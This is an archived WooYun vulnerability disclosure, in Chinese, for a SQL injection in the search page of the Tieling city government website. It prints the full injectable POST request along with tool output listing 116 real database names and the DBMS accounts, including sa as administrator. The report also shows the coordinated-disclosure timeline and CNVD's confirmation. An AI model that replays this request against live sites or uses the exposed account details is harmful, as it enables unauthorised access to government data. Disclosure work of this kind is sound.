乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
铁岭市人民政府网站:http://www.tieling.gov.cn/没有发现管理后台 所以没有getshell
POST /search.asp?table=tnews&n=搜索中心 HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://**.**.**.**/Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: **.**.**.**Content-Length: 41Pragma: no-cacheCookie: ASPSESSIONIDSSTCQDAS=JGGDFAJDBCKEBNIBKPCLGMHO; _gscu_451275280=45406106w72tyl13; _gscs_451275280=45406106p7cz8l13|pv:1; _gscbrs_451275280=1; CNZZDATA1253321814=2010883184-1445405877-%7C1445405877gjc=a%27&lm=title&Submit.x=30&Submit.y=11
参数:gjc
116个数据库:
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000available databases [116]:[*] aqj11[*] bsdt_qhq[*] bsdt_tls[*] bsdt_xfx[*] cjda[*] ctcg[*] ctrd[*] DataBase_TieLingQingHe[*] ds[*] dsw[*] DSystem[*] ewgzjj[*] fgw[*] gcjsbjxt[*] gfjj[*] GoodWomenTalent[*] hl[*] hs[*] hyjh[*] infoload[*] infots[*] jw2011[*] jzxh[*] kp[*] ldbzw[*] lhzt[*] ljjggw[*] ljmjd[*] ljxfx[*] lkjxx[*] lngd[*] lnoa[*] lnzw[*] lsj[*] master[*] mercury2_news[*] Mercury_V2[*] model[*] msdb[*] ncpaq[*] njj[*] Northwind[*] pubs[*] rfb[*] rmyh[*] sjj[*] SS403_qvzengfu[*] SS4_tllyw[*] SS4_tlqh[*] syw[*] tempdb[*] tgcjs[*] tl_rmyh[*] tlcd[*] tldaxxw[*] tldhl[*] tldj[*] tlfx[*] tlfzb[*] tlghj[*] tlgzw[*] tlht[*] tljx[*] tlkp[*] tlld_new1[*] tlly2005[*] tlly2011[*] tllyw_ssp[*] tllyxt[*] tlmj[*] tlnyjd[*] tlpd[*] tlqd[*] tlqggaj[*] tlqh[*] tlqlgk[*] tlqsw[*] tlrd2010[*] tlrdhy61[*] tlrdhy64[*] tlrdhy71[*] tlsslj[*] tlswdx[*] tlswsj[*] tlswzl[*] tlszf2006[*] tlwhw[*] tlywtz[*] tlzf_cg[*] tlzs[*] tlzx[*] tnewlnnkj[*] tQRF[*] tXMK[*] tXXSP[*] tXXZX2009[*] tyjc[*] tzgs[*] tzxgk_files_up[*] uModify[*] wgzjj[*] wjj[*] xfgaj[*] xfzf[*] xljk[*] xmj[*] xnc[*] xxdp[*] xy[*] ygsy[*] ylglc[*] yxcsc[*] yzq[*] zh[*] zxqy[*] zys
数据库用户:
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000database management system users privileges:[*] 123[*] BUILTIN\\Administrators[*] ke8-pu5[*] kp[*] linlin2007[*] linzhou[*] sa (administrator)[*] sun56[*] sylt[*] tlfzb[*] tlslj[*] tlzxqyadmin[*] xxzxfgw001[*] xy[*] zhangweiadmin
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-10-26 16:49
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无